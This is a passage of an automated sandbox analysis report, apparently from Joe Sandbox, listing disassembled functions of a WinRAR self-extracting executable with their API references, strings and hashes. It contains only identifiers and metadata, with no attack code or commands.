                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4071DF326086C2C7DB61AF35D4406BDBBA1EB01B85F988136EE8C47B89CF2CD951C715
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB8A1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                              • String ID: $*
                                                                                                                                                                                                              • API String ID: 3215553584-3982473090
                                                                                                                                                                                                              • Opcode ID: 1fe992e3b21ed6e277c25637e2d918cc9b498a8db712953a6122dc97eefb4a6e
                                                                                                                                                                                                              • Instruction ID: 1df4688fe5adc67b687059389f1ed628351f07876327c27846b5e6ef128428fd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fe992e3b21ed6e277c25637e2d918cc9b498a8db712953a6122dc97eefb4a6e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C5166B6D0C682CBE774AE3480443BEB7A0EB05B19F9C1135C64A45299CF7DDC83CA29
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBC2328 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWide$StringType
                                                                                                                                                                                                              • String ID: $%s
                                                                                                                                                                                                              • API String ID: 3586891840-3791308623
                                                                                                                                                                                                              • Opcode ID: dcf1179f887acf3f03fae2aa746e4f8e497bec91aadf3a19f0aaa578cb231d04
                                                                                                                                                                                                              • Instruction ID: b9ac307aa1559b08e320dac59a6a1a026f5ac6da5d8ce5867fd30e13eaeb8788
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dcf1179f887acf3f03fae2aa746e4f8e497bec91aadf3a19f0aaa578cb231d04
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB414B22B15AC6CAEF60AF35D8006EAA291FB44BA8F8C4635DA1D477D4DF3CE4418360
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB7270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                              • API String ID: 2466640111-1018135373
                                                                                                                                                                                                              • Opcode ID: 66eca801a9d00b7d9e763ddd8c3af4c505d5db1633ec81abcdf18ecf3f2132e2
                                                                                                                                                                                                              • Instruction ID: e0142cfd24b380751e5cbb2062c969fef0270445c6a422caa9655af00fbd64d0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66eca801a9d00b7d9e763ddd8c3af4c505d5db1633ec81abcdf18ecf3f2132e2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17516E72618782C7D620BF25E4406AEB7A4FB89B90F980634DB8D07B55CF3CE891CB15
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBC5468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                              • API String ID: 2456169464-4171548499
                                                                                                                                                                                                              • Opcode ID: a28a4e46a9ca9fab7cc56e0cc731ca783139516c82e2ed666e11d04f179ad998
                                                                                                                                                                                                              • Instruction ID: 16055e8805ae0653eda920f8d97321a2b17d02e5604e5d980acbe71133ccbe55
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a28a4e46a9ca9fab7cc56e0cc731ca783139516c82e2ed666e11d04f179ad998
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5341A522B19A82C2EB209F25E8443FBA761F788794F894031EE4D87794DF3CD541C750
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBAE778 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ObjectRelease
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1429681911-3916222277
                                                                                                                                                                                                              • Opcode ID: d898f78adfb05b648df438d709e785208bff370aef0046d885f520d2dd6bd53f
                                                                                                                                                                                                              • Instruction ID: 6b957a1bc75adaa6bf0c2af1b9732f2ed85620713ae1d175da5b0fbee140dd02
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d898f78adfb05b648df438d709e785208bff370aef0046d885f520d2dd6bd53f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23314C75A1878286DB04AF12B81866EF7A5FB89FD5F844035ED8A43B18CF3CD44ACB04
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBAE9E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Item$Text$Dialog
                                                                                                                                                                                                              • String ID: ASKNEXTVOL
                                                                                                                                                                                                              • API String ID: 2638039312-3402441367
                                                                                                                                                                                                              • Opcode ID: 7190d999122fb7ef0644a676578768d06a5f9d004810f71a5d751715da3a6182
                                                                                                                                                                                                              • Instruction ID: 5bda2907502b6dd2426b6a33602e0f9f6bcfb7e6b4f30b8a96f5a945bc594810
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7190d999122fb7ef0644a676578768d06a5f9d004810f71a5d751715da3a6182
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B316D65A087C2C2E714BB66E5443F9A7A0FB85FC0F9C4036DA8D07795DE3EE9458360
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBAF040 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Item$Text$Dialog
                                                                                                                                                                                                              • String ID: GETPASSWORD1
                                                                                                                                                                                                              • API String ID: 2638039312-3292211884
                                                                                                                                                                                                              • Opcode ID: 38551b2ca09f9753cba606584b00be4ca3281cb5be7db73114003ba1b6517f11
                                                                                                                                                                                                              • Instruction ID: cf7e21f3d04a868d37cd69bb8a985190204ce8227e86668ca38805819acd390c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38551b2ca09f9753cba606584b00be4ca3281cb5be7db73114003ba1b6517f11
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14217F32A18682C6E761AF21E0807FDA3A5FB447C0FA84035DA8D43699DF3DD9198760
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBAEF38 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                              • String ID: Software\WinRAR SFX
                                                                                                                                                                                                              • API String ID: 3677997916-754673328
                                                                                                                                                                                                              • Opcode ID: bd67bf4eca4e96bbfb7823fd60402b03fb1a23a033adf12eadccf8680c330e25
                                                                                                                                                                                                              • Instruction ID: 92b300b9c58a65681f682e18dd6564f3eb7120d1a87a15050ef7b099ed804d2a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd67bf4eca4e96bbfb7823fd60402b03fb1a23a033adf12eadccf8680c330e25
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C214172618AC696E730AF34E8406EEB3A4FB44784F844135EB8D47A99DF2CD544C714
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBA2A9C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                                                                              • String ID: Thread pool initialization failed.
                                                                                                                                                                                                              • API String ID: 3340455307-2182114853
                                                                                                                                                                                                              • Opcode ID: 9467bf698a5016be8981c373cf63f07ed8df11c917c4e7cfbd939ec3733cb218
                                                                                                                                                                                                              • Instruction ID: 96320843e867a33d2f94cca6a7b615e14dc39e4620df72b4f35a4bceb9d7d83d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9467bf698a5016be8981c373cf63f07ed8df11c917c4e7cfbd939ec3733cb218
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE21D532A15682C6FB11AF34D4543FA72E2EB88B08F9CC035CA4D4B285DF7E9445C7A0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB2124 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EnvironmentVariable
                                                                                                                                                                                                              • String ID: sfxcmd$sfxpar
                                                                                                                                                                                                              • API String ID: 1431749950-3493335439
                                                                                                                                                                                                              • Opcode ID: bf6240e6559597ef1e3307bacd14adb4926a86e6e50a8378cbca2566d8a75db0
                                                                                                                                                                                                              • Instruction ID: 18cc8582d13454c2bd58fd90d955ac5ac2e5a54a5ee7446774f7d53b3ac2296f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf6240e6559597ef1e3307bacd14adb4926a86e6e50a8378cbca2566d8a75db0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BDF03650F0A593C2EE527B31DC583FA9251AF54B81FCC0035D98D4A391EE2CD945C630
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBAE2E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CapsDeviceRelease
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 127614599-3916222277
                                                                                                                                                                                                              • Opcode ID: 4b8fae0df9eb35910b15eab22c1e8c1b692cd2926488e9f1acc43bb90b05e17d
                                                                                                                                                                                                              • Instruction ID: dedad8b576332a3193cb532cde73fabf1f970d75cda1f602ef25d7f0e0128071
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b8fae0df9eb35910b15eab22c1e8c1b692cd2926488e9f1acc43bb90b05e17d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2DE0C220B0868282EB0867B6F58903EE261AB4CBD0F598039DA0E43744CD3DC4C64300
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB9B504 Relevance: 6.1, APIs: 4, Instructions: 121filetimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,?,?,?,?,00007FF75FB98D5A,-00000044,00007FF75FB99A4F,?,?,?,?,00000000,00000000), ref: 00007FF75FB9B5AD
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,?,?,?,?,00007FF75FB98D5A,-00000044,00007FF75FB99A4F,?,?,?,?,00000000,00000000), ref: 00007FF75FB9B602
                                                                                                                                                                                                              • SetFileTime.KERNEL32(?,?,?,?,?,?,?,00007FF75FB98D5A,-00000044,00007FF75FB99A4F,?,?,?,?,00000000,00000000), ref: 00007FF75FB9B691
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00007FF75FB98D5A,-00000044,00007FF75FB99A4F,?,?,?,?,00000000,00000000), ref: 00007FF75FB9B69F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Create$CloseHandleTime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2287278272-0
                                                                                                                                                                                                              • Opcode ID: efb8b38ed1fe1b5a5afe749e9127ea4cf0f45449dda3845108041256562c5dfe
                                                                                                                                                                                                              • Instruction ID: 8a259b730958c389337c3440169902b3709f767699c3d96c08cfdfd6c405912f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: efb8b38ed1fe1b5a5afe749e9127ea4cf0f45449dda3845108041256562c5dfe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E41F622A0D6C281E760AA31A6503FBE2A0BF857E4F988231ED9C067D6DE7CD5488710
                                                                                                                                                                                                              Uniqueness

